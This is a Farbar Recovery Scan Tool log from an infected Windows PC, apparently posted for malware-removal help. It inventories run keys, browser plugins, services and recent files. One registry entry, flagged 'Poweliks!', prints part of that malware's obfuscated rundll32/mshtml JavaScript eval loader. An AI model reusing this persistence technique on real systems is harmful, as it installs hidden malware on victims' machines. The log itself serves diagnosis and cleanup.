    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\cmmon32.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\msfeedssync.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\fixmapi.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\upnpcont.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\systray.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\NAPSTAT.EXE
    (Microsoft Corporation) C:\Windows\SysWOW64\wiaacmgr.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Microsoft Corporation) C:\Windows\SysWOW64\dllhost.exe


    ==================== Registry (Whitelisted) ==================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [Logitech Download Assistant] => C:\Windows\system32\rundll32.exe C:\Windows\System32\LogiLDA.dll,LogiFetch
    HKLM-x32\...\Run: [WD Quick View] => C:\Program Files (x86)\Western Digital\WD Quick View\WDDMStatus.exe [5237256 2012-12-20] (Western Digital Technologies, Inc.)
    HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2014-02-21] (Apple Inc.)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101584 2014-04-25] (Safer-Networking Ltd.)
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5226600 2014-12-20] (AVAST Software)
    HKLM-x32\...\Run: [GrooveMonitor] => C:\Program Files (x86)\Microsoft Office\Office12\GrooveMonitor.exe [31016 2006-10-26] (Microsoft Corporation)
    HKLM-x32\...\Run: [Intuit SyncManager] => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe [623880 2008-09-09] (Intuit Inc. All rights reserved.)
    HKLM-x32\...\Run: [LTCM Client] => C:\Program Files (x86)\LTCM Client\ltcmClient.exe [2756864 2011-04-07] (Leader Technologies Inc.)
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [271744 2014-09-26] (Oracle Corporation)
    HKLM-x32\...\Run: [] => [X]
    Winlogon\Notify\igfxcui: C:\WINDOWS\system32\igfxdev.dll (Intel Corporation)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [2573416 2012-10-17] (Hewlett-Packard Co.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [SUPERAntiSpyware] => C:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe [7780120 2014-12-19] (SUPERAntiSpyware)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [eFax 4.4] => C:\Program Files (x86)\eFax Messenger 4.4\J2GDllCmd.exe [95744 2012-08-29] (j2 Global Communications, Inc.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [cdloader] => C:\Users\NorMac\AppData\Roaming\mjusbsp\cdloader2.exe [51592 2014-07-04] (magicJack L.P.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [NETGEARGenie] => C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenie.exe [602880 2013-11-14] (NETGEAR Inc.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [Spybot-S&D Cleaning] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDCleaner.exe [4566984 2014-04-25] (Safer-Networking Ltd.)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [EssentialPIM] => C:\Program Files (x86)\EssentialPIM\EssentialPIM.exe [17719664 2014-12-01] (Astonsoft)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [7394584 2014-12-12] (Piriform Ltd)
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Policies\Explorer: [NoInternetOpenWith] 1
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf> (the data entry has 243 more characters). <==== Poweliks!
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\McAfee Security Scan Plus.lnk
    ShortcutTarget: McAfee Security Scan Plus.lnk -> C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe (McAfee, Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnk
    ShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)
    Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WDDMStatus.lnk
    ShortcutTarget: WDDMStatus.lnk -> C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMStatus.exe (Western Digital Technologies, Inc.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\eFax 4.4.lnk
    ShortcutTarget: eFax 4.4.lnk -> C:\Program Files (x86)\eFax Messenger 4.4\J2GTray.exe (j2 Global Communications, Inc.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HMA Pro VPN 2.0.lnk
    ShortcutTarget: HMA Pro VPN 2.0.lnk -> C:\Program Files (x86)\HMA! Pro VPN\bin\HMA! Pro VPN.exe (Privax)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk
    ShortcutTarget: Monitor Ink Alerts - HP Officejet Pro 8600 (Network).lnk -> C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
    Startup: C:\Users\NorMac\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sidebar.lnk
    ShortcutTarget: Sidebar.lnk -> C:\Program Files\Windows Sidebar\sidebar.exe (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll (AVAST Software)
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    HKU\S-1-5-21-485173556-832918840-2370493585-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=msnhome
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
    HKU\S-1-5-21-485173556-832918840-2370493585-1000\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/?pc=AV01
    StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
    SearchScopes: HKLM-x32 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
    SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
    SearchScopes: HKU\S-1-5-21-485173556-832918840-2370493585-1000 -> {632F07F3-19A1-4d16-A23F-E6CE9486BAB5} URL = http://www.bing.com/search?q={searchTerms}&FORM=AVASDF&PC=AV01
    BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll (AVAST Software)
    BHO: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files (x86)\WinZip Courier\wzwmcie64.dll (WinZip Computing, S.L.)
    BHO-x32: RealPlayer Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll (RealDownloader)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office12\GrooveShellExtensions.dll (Microsoft Corporation)
    BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
    BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll (AVAST Software)
    BHO-x32: WinZip Courier BHO -> {A8FB70FA-0FDF-4601-9DC4-BFA1B357204F} -> C:\Program Files (x86)\WinZip Courier\wzwmcie32.dll (WinZip Computing, S.L.)
    BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
    Toolbar: HKLM-x32 - No Name - {41525333-0076-A76A-76A7-7A786E7484D7} - No File
    DPF: HKLM-x32 {6A060448-60F9-11D5-A6CD-0002B31F7455}
    Handler-x32: intu-help-qb2 - {84D77A00-41B5-4b8b-8ADF-86486D72E749} - C:\Program Files (x86)\Intuit\QuickBooks 2009\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)
    Handler-x32: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\WINDOWS\SysWOW64\mscoree.dll (Microsoft Corporation)

    FireFox:
    ========
    FF ProfilePath: C:\Users\NorMac\AppData\Roaming\Mozilla\Firefox\Profiles\p4jsu73l.default-1415307498372
    FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_16_0_0_235.dll ()
    FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_16_0_0_235.dll ()
    FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\WINDOWS\SysWOW64\Adobe\Director\np32dsw_1202122.dll (Adobe Systems, Inc.)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
    FF Plugin-x32: @exent.com/npExentCtl,version=7.0.0.0 -> C:\Program Files (x86)\Free Ride Games\npExentCtl.dll No File
    FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
    FF Plugin-x32: @java.com/DTPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
    FF Plugin-x32: @java.com/JavaPlugin,version=10.71.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
    FF Plugin-x32: @real.com/nppl3260;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nppl3260.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlchromebrowserrecordext;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlchromebrowserrecordext.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprndlpepperflashvideoshim;version=1.3.3 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlpepperflashvideoshim.dll (RealNetworks, Inc.)
    FF Plugin-x32: @real.com/nprpplugin;version=16.0.3.51 -> C:\Program Files (x86)\Real\RealPlayer\Netscape6\nprpplugin.dll (RealPlayer)
    FF Plugin-x32: @realnetworks.com/npdlplugin;version=1 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\npdlplugin.dll (RealDownloader)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
    FF Plugin-x32: @winzip.com/Winzip Courier -> C:\Program Files (x86)\WinZip Courier\npwzwmc.dll (WinZip Computing, S.L.)
    FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
    FF Plugin-x32: www.exent.com/GameTreatWidget -> C:\Program Files (x86)\Free Ride Games\NPGameTreatPlugin.dll No File
    FF Plugin HKU\S-1-5-21-485173556-832918840-2370493585-1000: @citrixonline.com/appdetectorplugin -> C:\Users\NorMac\AppData\Local\Citrix\Plugins\104\npappdetector.dll (Citrix Online)
    FF Plugin HKU\S-1-5-21-485173556-832918840-2370493585-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\NorMac\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll (Unity Technologies ApS)
    FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
    FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-05-01]
    FF HKLM-x32\...\Firefox\Extensions: [{74c841e3-b59f-479e-8d7a-e26a942a87c8}] - C:\Program Files (x86)\WinZip Courier\FFExt
    FF Extension: WinZip Courier - C:\Program Files (x86)\WinZip Courier\FFExt [2014-04-05]
    FF HKLM-x32\...\Firefox\Extensions: [{DF153AFF-6948-45d7-AC98-4FC4AF8A08E2}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
    FF HKLM-x32\...\Firefox\Extensions: [wrc@avast.com] - C:\Program Files\AVAST Software\Avast\WebRep\FF
    FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2014-06-10]
    FF HKU\S-1-5-21-485173556-832918840-2370493585-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: McAfee Security Scan Plus - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04]

    Chrome:
    =======
    CHR Profile: C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Google Slides) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2014-11-16]
    CHR Extension: (Google Docs) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-16]
    CHR Extension: (Google Drive) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-16]
    CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-06-10]
    CHR Extension: (YouTube) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-16]
    CHR Extension: (Google Search) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-16]
    CHR Extension: (Google Sheets) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2014-11-16]
    CHR Extension: (Avast Online Security) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2014-08-08]
    CHR Extension: (WinZip Courier) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\ilckobikkmajlmhhdenkhonjkoaneclk [2014-05-28]
    CHR Extension: (Google Wallet) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-02-28]
    CHR Extension: (Gmail) - C:\Users\NorMac\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-16]
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2014-12-20]
    CHR HKLM-x32\...\Chrome\Extension: [idhngdhcfkoamngbedgpaokgjbnpdiji] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Chrome\Ext\realdownloader.crx [2013-08-14]
    CHR HKLM-x32\...\Chrome\Extension: [ilckobikkmajlmhhdenkhonjkoaneclk] - C:\Program Files (x86)\WinZip Courier\wzwmcgc.crx [2013-02-27]

    ==================== Services (Whitelisted) =================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-08-16] (SUPERAntiSpyware.com)
    R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [50344 2014-12-20] (AVAST Software)
    S3 AvastVBoxSvc; C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe [4012248 2014-12-20] (Avast Software)
    R2 HPSLPSVC; C:\Program Files (x86)\HP\Digital Imaging\bin\HPSLPSVC64.DLL [1039360 2011-08-18] (Hewlett-Packard Co.) [File not signed]
    S2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe [89352 2014-09-15] (Hewlett-Packard Company)
    S3 McComponentHostService; C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe [289256 2014-04-09] (McAfee, Inc.)
    S2 Net Driver HPZ12; C:\Windows\System32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
    R2 NETGEARGenieDaemon; C:\Program Files (x86)\NETGEAR Genie\bin\NETGEARGenieDaemon64.exe [232192 2013-11-14] (NETGEAR)
    S3 OpenVPNService; C:\Program Files (x86)\HMA! Pro VPN\bin\openvpnserv.exe [34528 2013-04-24] (The OpenVPN Project)
    S2 Pml Driver HPZ12; C:\Windows\System32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
    R2 QBCFMonitorService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [24576 2008-09-10] (Intuit) [File not signed]
    S3 QBFCService; C:\Program Files (x86)\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2008-08-08] (Intuit Inc.) [File not signed]
    R2 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39056 2013-08-14] ()
    R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738200 2014-04-25] (Safer-Networking Ltd.)
    R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2081752 2014-04-25] (Safer-Networking Ltd.)
    R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
    R2 Start8; C:\Program Files (x86)\Stardock\Start8\Start8Srv.exe [142960 2013-03-19] (Stardock Software, Inc)
    S2 WDBackup; C:\Program Files (x86)\Western Digital\WD SmartWare\WDBackupEngine.exe [1155088 2012-12-20] (Western Digital )
    R2 WDDMService; C:\Program Files\Western Digital\WD SmartWare\WD Drive Manager\WDDMService.exe [288768 2011-03-09] (WDC) [File not signed]
    R2 WDDriveService; C:\Program Files (x86)\Western Digital\WD Drive Manager\WDDriveService.exe [248840 2012-12-20] (Western Digital)
    R2 WDFME; C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDFME\WDFME.exe [1066896 2011-03-09] ()
    R2 WDRulesService; C:\Program Files (x86)\Western Digital\WD SmartWare\WDRulesEngine.exe [1178128 2012-12-20] (Western Digital )
    R2 WDSC; C:\Program Files (x86)\Western Digital\WD SmartWare\Front Parlor\WDSC.exe [491920 2011-03-09] ()
    S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [16032 2014-09-22] (Microsoft Corporation)

    ==================== Drivers (Whitelisted) ====================

    (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)

    R2 aswHwid; C:\Windows\system32\drivers\aswHwid.sys [29208 2014-12-20] ()
    R2 aswMonFlt; C:\Windows\system32\drivers\aswMonFlt.sys [83280 2014-12-20] (AVAST Software)
    R1 aswRdr; C:\Windows\system32\drivers\aswRdr2.sys [93568 2014-12-20] (AVAST Software)
    R0 aswRvrt; C:\Windows\System32\Drivers\aswRvrt.sys [65776 2014-12-20] ()
    R1 aswSnx; C:\Windows\system32\drivers\aswSnx.sys [1050432 2014-12-20] (AVAST Software)
    R1 aswSP; C:\Windows\system32\drivers\aswSP.sys [436624 2014-12-20] (AVAST Software)
    R2 aswStm; C:\Windows\system32\drivers\aswStm.sys [116728 2014-12-20] (AVAST Software)
    R0 aswVmm; C:\Windows\System32\Drivers\aswVmm.sys [267632 2014-12-20] ()
    S3 dot4; C:\Windows\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows (R) Win 7 DDK provider)
    S3 Dot4Print; C:\Windows\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows (R) Win 7 DDK provider)
    S3 ICDUSB3; C:\Windows\System32\Drivers\ICDUSB3.sys [13312 2008-08-18] (Sony Corporation)
    R3 NPF; C:\Windows\System32\drivers\NPF.sys [35344 2014-02-11] (CACE Technologies, Inc.)
    R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
    R2 VBoxAswDrv; C:\Program Files\AVAST Software\Avast\ng\vbox\VBoxAswDrv.sys [271752 2014-12-20] (Avast Software)
    S3 catchme; \??\C:\ComboFix\catchme.sys [X]
    S2 X5XSEx_Pr143; \??\C:\Program Files (x86)\Free Ride Games\X5XSEx_Pr143.Sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)


    ==================== One Month Created Files and Folders ========

    (If an entry is included in the fixlist, the file\folder will be moved.)

    2015-01-04 09:06 - 2015-01-04 09:06 - 01707939 _____ (Thisisu) C:\Users\NorMac\Downloads\JRT (2).exe
    2015-01-04 09:03 - 2015-01-04 09:05 - 00025082 _____ () C:\Users\NorMac\Downloads\FRST.txt
    2015-01-04 09:01 - 2015-01-04 09:01 - 02173952 _____ () C:\Users\NorMac\Downloads\AdwCleaner (1).exe
    2015-01-04 09:00 - 2015-01-04 09:03 - 00000000 ____D () C:\FRST
    2015-01-04 08:51 - 2015-01-04 08:52 - 02123776 _____ (Farbar) C:\Users\NorMac\Downloads\FRST64.exe
    2015-01-03 23:10 - 2015-01-03 23:10 - 00002790 _____ () C:\Users\NorMac\Desktop\cc_20150103_230953.reg
    2015-01-03 22:33 - 2015-01-03 22:33 - 00003234 _____ () C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-485173556-832918840-2370493585-1000
    2015-01-03 22:32 - 2015-01-03 22:32 - 00003366 _____ () C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-485173556-832918840-2370493585-1000
    2015-01-02 19:06 - 2015-01-02 19:06 - 00000000 ____D () C:\ProgramData\Sophos
    2015-01-02 19:04 - 2015-01-02 19:04 - 00002759 _____ () C:\Users\Public\Desktop\Sophos Virus Removal Tool.lnk
    2015-01-02 19:04 - 2015-01-02 19:04 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sophos
    2015-01-02 19:04 - 2015-01-02 19:04 - 00000000 ____D () C:\Program Files (x86)\Sophos
    2015-01-02 18:59 - 2015-01-02 18:47 - 107479960 _____ (Sophos Limited) C:\Users\NorMac\Desktop\Sophos Virus Removal Tool(1).exe
    2015-01-02 17:31 - 2015-01-02 17:40 - 01771732 _____ (Sophos Limited) C:\Users\NorMac\Downloads\Unconfirmed 257443.crdownload
    2015-01-02 12:53 - 2015-01-02 12:53 - 06824304 _____ (ParetoLogic, Inc.) C:\Users\NorMac\Downloads\Repair_Tool.exe
    2015-01-02 12:42 - 2015-01-02 12:42 - 00000794 _____ () C:\WINDOWS\setupact.log
    2015-01-02 12:42 - 2015-01-02 12:42 - 00000000 _____ () C:\WINDOWS\setuperr.log
    2015-01-02 09:03 - 2015-01-02 09:03 - 00000999 _____ () C:\Users\NorMac\Desktop\magicJack.lnk
    2015-01-01 22:21 - 2015-01-01 22:21 - 00050508 _____ () C:\Users\NorMac\Desktop\cc_20150101_222046.reg
    2015-01-01 21:44 - 2015-01-01 21:45 - 125705984 _____ (Microsoft Corporation) C:\Users\NorMac\Downloads\msert.exe
    2015-01-01 21:03 - 2015-01-01 21:03 - 00002774 _____ () C:\WINDOWS\System32\Tasks\CCleanerSkipUAC
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000786 _____ () C:\Users\Public\Desktop\CCleaner.lnk
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CCleaner
    2015-01-01 21:03 - 2015-01-01 21:03 - 00000000 ____D () C:\Program Files\CCleaner
    2015-01-01 21:02 - 2015-01-01 21:02 - 05317104 _____ (Piriform Ltd) C:\Users\NorMac\Downloads\ccsetup501.exe
    2015-01-01 19:15 - 2015-01-01 19:30 - 00002278 _____ () C:\Users\NorMac\Desktop\Rkill.txt
    2014-12-31 22:19 - 2015-01-03 23:24 - 00451271 _____ () C:\WINDOWS\WindowsUpdate.log
    2014-12-31 22:17 - 2014-12-31 22:18 - 00511088 _____ () C:\WINDOWS\system32\FNTCACHE.DAT
    2014-12-31 19:57 - 2014-12-31 19:57 - 00149144 _____ () C:\Users\NorMac\AppData\Local\GDIPFONTCACHEV1.DAT
    2014-12-30 20:11 - 2014-12-30 20:11 - 00516603 _____ () C:\Users\NorMac\Downloads\2813_timeline_business_plan.zip
    2014-12-30 20:10 - 2014-12-30 20:11 - 00436139 _____ () C:\Users\NorMac\Downloads\2828-timeline-gantt-ppt.zip
    2014-12-30 20:10 - 2014-12-30 20:10 - 00216114 _____ () C:\Users\NorMac\Downloads\marketing-plan-timeline-template.zip
    2014-12-30 20:09 - 2014-12-30 20:10 - 00172321 _____ () C:\Users\NorMac\Downloads\partner-development-powerpoint-timeline(1).zip
    2014-12-30 20:09 - 2014-12-30 20:09 - 00188111 _____ () C:\Users\NorMac\Downloads\resume-timeline-career-path.zip
    2014-12-30 20:08 - 2014-12-30 20:09 - 00172321 _____ () C:\Users\NorMac\Downloads\partner-development-powerpoint-timeline.zip
    2014-12-30 20:07 - 2014-12-30 20:07 - 00138727 _____ () C:\Users\NorMac\Downloads\1028_schedule_ppt.zip
    2014-12-30 20:06 - 2014-12-30 20:06 - 00348531 _____ () C:\Users\NorMac\Downloads\980_post_it_ppt.zip
